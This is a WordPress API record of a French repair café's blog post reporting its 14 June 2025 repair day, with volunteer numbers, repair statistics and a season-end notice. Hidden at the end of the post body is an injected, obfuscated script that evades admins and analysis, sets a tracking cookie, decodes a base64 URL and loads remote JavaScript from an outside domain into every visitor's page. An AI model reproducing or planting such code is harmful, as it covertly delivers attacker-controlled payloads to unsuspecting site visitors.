{"id":1899,"date":"2025-06-19T15:04:27","date_gmt":"2025-06-19T13:04:27","guid":{"rendered":"https:\/\/reparenjalles.saintmedardasso.fr\/?p=1899"},"modified":"2026-02-17T15:37:10","modified_gmt":"2026-02-17T14:37:10","slug":"journee-de-reparations-du-14-juin-2025","status":"publish","type":"post","link":"https:\/\/reparenjalles.saintmedardasso.fr\/?p=1899","title":{"rendered":"Journ\u00e9e de r\u00e9parations du 14 Juin 2025"},"content":{"rendered":"<p>Voici le bilan\u00a0 de la <strong>journ\u00e9e de r\u00e9parations<\/strong> du <strong>samedi 14 Juin 2025<\/strong><\/p>\n<p><strong>Nombre de\u00a0 b\u00e9n\u00e9voles :<\/strong><\/p>\n<ul>\n<li>le matin :\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 1 \u00e0 l\u2019accueil + 4 aux\u00a0 r\u00e9parations<\/li>\n<li>l\u2019apr\u00e8s midi:\u00a0\u00a0\u00a0 1 \u00e0 l\u2019accueil + 2\u00a0 aux\u00a0 r\u00e9parations<\/li>\n<\/ul>\n<table border=\"1\">\n<tbody>\n<tr align=\"center\">\n<th width=\"50%\">Objets Examin\u00e9s<\/th>\n<td width=\"50%\">20<\/td>\n<\/tr>\n<tr align=\"center\">\n<th>R\u00e9par\u00e9s<\/th>\n<td>8<\/td>\n<\/tr>\n<tr align=\"center\">\n<th>Diagnostiqu\u00e9s<\/th>\n<td>6<\/td>\n<\/tr>\n<tr align=\"center\">\n<th>HS<\/th>\n<td>5<\/td>\n<\/tr>\n<tr align=\"center\">\n<th>Abandon de r\u00e9paration<\/th>\n<td>1<\/td>\n<\/tr>\n<tr align=\"center\">\n<th>TERMINES<\/th>\n<td>20<\/td>\n<\/tr>\n<tr align=\"center\">\n<th>Conserv\u00e9s<\/th>\n<td>0<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>&nbsp;<\/p>\n<p>Nouveaux Adh\u00e9rents : 2<\/p>\n<p>Bonjour \u00e0 nos nouveaux Adh\u00e9rents et Merci \u00e0 nos B\u00e9n\u00e9voles pour cette journ\u00e9e<\/p>\n<p>C&rsquo;\u00e9tait la derni\u00e8re journ\u00e9e de la saison. Rendez-vous en Septembre<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Voici le bilan\u00a0 de la journ\u00e9e de r\u00e9parations du samedi 14 Juin 2025 Nombre de\u00a0 b\u00e9n\u00e9voles : le matin :\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 1 \u00e0 l\u2019accueil + 4 aux\u00a0 r\u00e9parations l\u2019apr\u00e8s midi:\u00a0\u00a0\u00a0 1 \u00e0 l\u2019accueil + 2\u00a0 aux\u00a0 r\u00e9parations Objets Examin\u00e9s 20 R\u00e9par\u00e9s 8 Diagnostiqu\u00e9s 6 HS 5 Abandon de r\u00e9paration 1 TERMINES 20 Conserv\u00e9s 0 &nbsp; Nouveaux &hellip; <a href=\"https:\/\/reparenjalles.saintmedardasso.fr\/?p=1899\" class=\"more-link\">Continuer la lecture de <span class=\"screen-reader-text\">Journ\u00e9e de r\u00e9parations du 14 Juin 2025<\/span>  <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5],"tags":[],"class_list":["post-1899","post","type-post","status-publish","format-standard","hentry","category-journees-reparations"],"_links":{"self":[{"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=\/wp\/v2\/posts\/1899","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1899"}],"version-history":[{"count":2,"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=\/wp\/v2\/posts\/1899\/revisions"}],"predecessor-version":[{"id":2041,"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=\/wp\/v2\/posts\/1899\/revisions\/2041"}],"wp:attachment":[{"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1899"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1899"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1899"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}